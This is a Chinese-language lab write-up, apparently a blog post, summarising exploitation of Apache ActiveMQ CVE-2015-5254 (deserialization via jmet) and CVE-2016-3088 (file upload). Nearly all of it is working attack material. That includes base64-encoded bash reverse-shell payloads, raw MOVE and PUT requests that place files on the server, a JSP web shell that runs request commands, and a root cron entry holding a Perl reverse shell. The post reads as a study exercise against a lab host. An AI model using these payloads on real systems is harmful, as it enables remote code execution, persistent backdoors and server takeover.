楼主这次有点急,这次只做总结,详细过程请看末尾参考。
ActiveMQ 反序列化漏洞 CVE-2015-5254
总结:执行payload,然后点击消息,触发payload。
这里放一下我用过的命令
nmap -sS -T5 -n -p- 192.168.100.23
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.100.23 61616
http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616
echo "bash -i >& /dev/tcp/192.168.100.23/5555 0>&1" > /tmp/shell.sh && bash /tmp/shell.sh
bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616
一、命令执行创建文件
此时,会给目标ActiveMQ添加一个名为event的队列,可以通过 http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
看到这个队列的所有消息
二、反弹shell
点击消息我就不放了,直接放反弹的shell
三、命令执行sh脚本,然后反弹shell
此时,会给目标ActiveMQ添加一个名为event的队列,可以通过 http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
看到这个队列的所有消息
ActiveMQ 任意文件上传漏洞 CVE-2016-3088
一、通过fileserver和activeMQ绝对路径写入shell
MOVE包
MOVE /fileserver/test1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/test2.jsp
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
连接失败
换个马
这里我是看的这篇文章,ActiveMQ任意文件写入漏洞(CVE-2016-3088)
PS:这里注意最好是从原网页访问抓包,只修改前两行
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
成功!
二、写入计划任务(这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。)
这是一个比较稳健的方法。首先上传cron配置文件(注意,换行一定要\n
,不能是\r\n
,否则crontab执行会失败):
PUT包
PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.100.23";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
MOVE包
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
三、写入jetty.xml或jar
看原文吧,都是理论和原理